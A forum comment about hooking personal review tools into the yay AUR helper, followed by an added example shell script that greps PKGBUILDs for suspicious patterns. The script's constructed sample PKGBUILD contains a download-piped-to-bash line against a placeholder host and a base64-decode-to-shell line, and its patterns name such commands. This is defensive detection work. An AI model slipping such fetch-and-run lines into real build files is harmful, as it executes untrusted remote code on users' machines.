this post was submitted on 22 Jun 2026
Linux
[–] teawrecks@sopuli.xyz 3 points 1 week ago* (last edited 1 week ago)

Does anyone know if yay gives me the ability to hook my own tool in to review PKGBUILDs before accepting them? They argue that they don't want to just give attackers access to a scanning tool, because all they'd do is just iterate on their PKGBUILD until it reports "not detected". But if yay gives me an easy way to hook in whatever tool I want, the attacker can't be sure what tool to defeat. If thousands of people all run various tools, surely a few of them will spot the anomaly quickly.

Edit: it looks like they've added this exact functionality in response to the attacks: https://jguer.space/blog/2026-06-15-yay-v13
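The kind of personal review hook the comment describes, as an added example that is not part of the post, of yay, or of the linked blog: a small POSIX shell reviewer that greps a PKGBUILD for a handful of patterns a maintainer would want to eyeball (download piped into a shell, base64 decoding at build time, `eval`, `SKIP` checksums, sources pulled from a paste site) and returns the number of findings as its exit status. The calling convention (PKGBUILD path as the first argument, non-zero exit meaning "reject") is an assumption; the page does not describe yay's actual hook interface. The sample PKGBUILD written by `write_sample_pkgbuild` is constructed for the example and is not a real AUR package.

```shell
#!/bin/sh
# Hypothetical PKGBUILD review hook (added example, not yay's own code).
# Assumption: the package manager invokes this script with the PKGBUILD path
# as $1 and treats a non-zero exit status as "do not install".

FINDINGS=0
PKGBUILD_FILE=""

# check PATTERN DESCRIPTION: print matching lines of the current PKGBUILD and
# count one finding if the extended regex PATTERN matches anywhere in it.
check() {
    pattern="$1"; desc="$2"
    if grep -nE "$pattern" "$PKGBUILD_FILE" >/dev/null 2>&1; then
        printf '%s: %s\n' "$PKGBUILD_FILE" "$desc"
        grep -nE "$pattern" "$PKGBUILD_FILE" | sed 's/^/    /'
        FINDINGS=$((FINDINGS + 1))
    fi
}

# review_pkgbuild FILE: run every check and return the number of findings
# (0 means nothing flagged). Patterns are deliberately simple starting points
# for a personal reviewer, not a complete scanner.
review_pkgbuild() {
    PKGBUILD_FILE="$1"
    FINDINGS=0

    check '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba)?sh([[:space:]]|$)' \
          'download piped straight into a shell'
    check 'base64[[:space:]]+(-d|--decode)' \
          'base64 decoding at build time (common obfuscation)'
    check '(^|[^[:alnum:]_])eval[[:space:]]' \
          'eval of a dynamically built string'
    check 'sums=\(.*SKIP' \
          'checksum verification disabled with SKIP'
    check 'source=\(.*pastebin' \
          'source fetched from a paste site instead of a release tarball'

    return "$FINDINGS"
}

# write_sample_pkgbuild FILE: constructed sample exhibiting four of the five
# patterns above (everything except eval); not a real package.
write_sample_pkgbuild() {
    cat > "$1" <<'EOF'
# Constructed sample PKGBUILD for the review example (not a real AUR package)
pkgname=example-tool
pkgver=1.0.0
pkgrel=1
arch=('x86_64')
url="https://example.invalid"
source=("https://pastebin.invalid/raw/abc123")
sha256sums=('SKIP')

build() {
    cd "$srcdir"
    curl -s https://example.invalid/setup.sh | bash
    echo "ZWNobyBoaQ==" | base64 -d | sh
}

package() {
    install -Dm755 tool "$pkgdir/usr/bin/tool"
}
EOF
}

# Hook mode: review the PKGBUILD given on the command line.
if [ -n "${1:-}" ] && [ -f "$1" ]; then
    review_pkgbuild "$1"
    exit $?
fi

# Demo mode (no argument): review the constructed sample and show the output.
sample=$(mktemp)
write_sample_pkgbuild "$sample"
review_pkgbuild "$sample"
rm -f "$sample"
```

Because the script only greps the PKGBUILD text, it is cheap to run on every update and easy to extend with whatever patterns a given user cares about, which is exactly the variety the comment argues an attacker cannot tune a package against.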